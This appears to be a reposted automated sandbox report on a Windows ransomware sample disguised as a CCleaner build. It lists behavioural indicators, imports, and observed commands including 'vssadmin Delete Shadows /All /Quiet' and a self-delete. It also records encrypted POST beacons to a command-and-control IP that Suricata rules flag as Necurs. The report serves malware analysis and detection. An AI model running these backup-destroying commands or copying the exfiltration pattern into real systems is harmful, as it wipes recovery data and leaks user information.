zcuSHbuD2Wn3.exe

转自：https://www.hybrid-analysis.com/sample/f41d0e00ffe1f8932eda937bb8d32a83c8992c1f596bd3a741c08190925c9e64?environmentId=1

zcuSHbuD2Wn3.exe

Analyzed on April 28th 2016 06:45:03 (CEST) to Windows 7 32 bit
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by VxStream Sandbox v4.10 © Payload Security

Attention: this analysis ran with the legacy Usermode Monitor. It is highly recommended to use the Kernelmode Monitor.

Incident Response

Risk Assessment

Remote Access

Contains ability to listen for incoming connections

Spyware/Leak

POSTs files to a webserver

Ransomware

The input sample dropped a known ransomware file
Deletes volume snapshots (often used by Ransomware)

Fingerprint

Reads the cryptographic machine GUID
Contains ability to lookup the windows account name

Network Behavior

Contacts 1 host. View the network section for more details.

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

• Malicious Indicators 9

• External Systems
  • Detected Emerging Threats Alert
  • Sample was identified as malicious by at least one Antivirus engine
• Installation/Persistance
  • Allocates virtual memory in foreign process
  • Writes data to a remote process
• Spyware/Information Retrieval
  • Accesses potentially sensitive information from local browsers
• Unusual Characteristics
  • Contains native function calls
• Hiding 3 Malicious Indicators
  • All indicators are available only in the private webservice or standalone version

• Suspicious Indicators 25

• Anti-Detection/Stealthyness
  • Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
  • Sets the process error mode to suppress error box
• Anti-Reverse Engineering
  • Contains ability to register a top-level exception handler (often used as anti-debugging trick)
  • PE file has unusual entropy sections
• Environment Awareness
  • Contains ability to query the machine version
  • Reads the cryptographic machine GUID
• External Systems
  • Detected Emerging Threats Alert
• General
  • POSTs files to a webserver
• Installation/Persistance
  • Creates/touches files in windows directory
  • Monitors specific registry key for changes
• Network Related
  • Found potential IP address in binary/memory
  • Uses a User Agent typical for browsers, although no browser was ever launched
• System Destruction
  • Opens file with deletion access rights
• System Security
  • Contains ability to elevate privileges
  • Modifies proxy settings
• Unusual Characteristics
  • Imports suspicious APIs
  • Reads information about supported languages
• Hiding 8 Suspicious Indicators
  • All indicators are available only in the private webservice or standalone version

• Informative 12

• Environment Awareness
  • Contains ability to query machine time
  • Contains ability to query volume size
• General
  • Contacts server
  • Contains PDB pathways
  • Creates mutants
  • Loads modules at runtime
  • Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)
  • Runs shell commands
  • Spawns new processes
• Installation/Persistance
  • Contains ability to lookup the windows account name
  • Dropped files
• Network Related
  • Found potential URL in binary/memory

File Details

All Details:

zcuSHbuD2Wn3.exe

Filename

zcuSHbuD2Wn3.exe

Size

176KiB (179712 bytes)

Type

PE32 executable (GUI) Intel 80386, for MS Windows

Architecture

32 Bit

SHA256

f41d0e00ffe1f8932eda937bb8d32a83c8992c1f596bd3a741c08190925c9e64

Resources

Language

ENGLISH

Icon

Visualization

Input File (PortEx)

Version Info

LegalCopyright

Copyright 2005-2015 Piriform Ltd

InternalName

ecleaner

FileVersion

5, 11, 00, 5408

CompanyName

Piriform Ltd

Comments

CCleaner

ProductName

ECleaner

ProductVersion

5, 11, 00, 5408

FileDescription

ECleaner

OriginalFilename

ecleaner.exe

Translation

0x0409 0x04b0

Classification (TrID)

• 42.1% (.EXE) Win32 Executable MS Visual C++ (generic)
• 37.3% (.EXE) Win64 Executable (generic)
• 8.8% (.DLL) Win32 Dynamic Link Library (generic)
• 6.0% (.EXE) Win32 Executable (generic)
• 2.7% (.EXE) Generic Win/DOS Executable

File Sections

Name	Entropy	Virtual Address	Virtual Size	Raw Size	MD5
.text	7.19416578985	0x1000	0xd81c	0xda00	dc477c948bb1c3b2b02a2c06f21bce41
.rdata	7.00522995426	0xf000	0x607e	0x6200	ba119d8969b22deb95fff87151770dcc
.data	5.73888696164	0x16000	0x1ffcc	0xa000	6931d76d06e9f6cfb66eed2c7ea6822d
.rsrc	6.06123760702	0x36000	0xb2d8	0xb400	a46d31563c53ef2608cc13435e0bdf8a
.reloc	5.74573837761	0x42000	0x28be	0x2a00	ae2bce3b3de378760313167964be2a7b

File Imports

• ADVAPI32.dll
• KERNEL32.dll
• msvcrt.dll
• ole32.dll
• oledlg.dll
• PSAPI.DLL
• SHELL32.dll
• SHLWAPI.dll
• USER32.dll
• USERENV.dll
• VERSION.dll
• WTSAPI32.dll

BuildExplicitAccessWithNameW

ChangeServiceConfigW

CloseServiceHandle

ControlService

CreateProcessAsUserW

CreateServiceW

DeleteService

DeregisterEventSource

DuplicateTokenEx

EnumDependentServicesW

GetNamedSecurityInfoW

GetTokenInformation

OpenProcessToken

OpenSCManagerW

OpenServiceW

QueryServiceStatusEx

RegCloseKey

RegCreateKeyExW

RegCreateKeyW

RegEnumKeyW

RegisterEventSourceW

RegisterServiceCtrlHandlerExW

RegOpenKeyExW

RegOpenKeyW

RegQueryValueExW

RegSetValueExW

ReportEventW

RevertToSelf

SetEntriesInAclW

SetNamedSecurityInfoW

SetServiceStatus

SetTokenInformation

StartServiceCtrlDispatcherW

StartServiceW

Screenshots

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 3 processes in total (System Resource Monitor).

• zcuSHbuD2Wn3.exe (PID: 3824)
  • vssadmin.exe Delete Shadows /All /Quiet (PID: 1128)
  • cmd.exe /C del /Q /F "%TEMP%\sysE574.tmp" (PID: 2984)

Reduced Monitoring

Contains Streams

Memory Dumps Available

Network Analysis

DNS Requests

No relevant DNS requests were made.

Contacted Hosts

Host Address	Host Port	Host Protocol	Host Details
31.41.44.246	80	TCP	Russian Federation ASN: 49505 (OOO Network of data-centers Selectel)

Port Protocol Description
Port 80: Hypertext Transfer Protocol (HTTP)

Contacted Countries

HTTP Traffic

Endpoint	Method/Response	URL/Code	Data
31.41.44.246:80	POST	/userinfo.php	POST /userinfo.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.41.44.246Content-Length: 423Connection: Keep-AliveCache-Control: no-cacheRaw hex: 96FB7447BC33B71634CFBFA0BC46CE2D94AA40AF9A125BF5B99B4C3940DDD8750F8A45D6555554220AA503AD9B08833514BCBA7E42EC5E25B14EF483CF7C3...
31.41.44.246:80	POST	/userinfo.php	POST /userinfo.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.41.44.246Content-Length: 190Connection: Keep-AliveCache-Control: no-cacheReadable: &bRaw hex: E226620EA2118C63F2CF235B2EB6AD65312A4499FCCD2FC10052507883AB6A4F4E937DD6AFEECE1DBA126ABB9CFB818C1D7BBFBCD35ED50CA3427F4BA1715...
31.41.44.246:80	POST	/userinfo.php	POST /userinfo.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.41.44.246Content-Length: 318Connection: Keep-AliveCache-Control: no-cacheRaw hex: 878C60B9709321AF10554F60EF3C01F67905EBBA9186A884E5C127870551E15482B43405CBF383B2DF08CAA2FAF0052B6591552E040902634AC2673AC3A64...
31.41.44.246:80	POST	/userinfo.php	POST /userinfo.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.41.44.246Content-Length: 397Connection: Keep-AliveCache-Control: no-cacheRaw hex: A0ADFDB6513C895D535C72667B75C686D27D9BBCEEE089F0506E283985CFA0814B7428CF7F18BB28EA50D17FBBDF01A17B19E0BC53D23D75E1ED99B66A783...

Emerging Threats

Event	Category	Description	SID
31.41.44.246:80 (TCP)	A Network Trojan was detected	ET TROJAN Generic - POST To .php w/Extended ASCII Characters	2017259
31.41.44.246:80 (TCP)	Potentially Bad Traffic	ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	2018358
31.41.44.246:80 (TCP)	A Network Trojan was detected	ET TROJAN Generic - POST To .php w/Extended ASCII Characters	2017259
31.41.44.246:80 (TCP)	A Network Trojan was detected	ET TROJAN Win32/Necurs Common POST Header Structure	2021995
31.41.44.246:80 (TCP)	Potentially Bad Traffic	ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	2018358
31.41.44.246:80 (TCP)	A Network Trojan was detected	ET TROJAN Generic - POST To .php w/Extended ASCII Characters	2017259
31.41.44.246:80 (TCP)	Potentially Bad Traffic	ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	2018358
31.41.44.246:80 (TCP)	A Network Trojan was detected	ET TROJAN Generic - POST To .php w/Extended ASCII Characters	2017259
31.41.44.246:80 (TCP)	Potentially Bad Traffic	ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	2018358

ET rules applied using Suricata.

Extracted Strings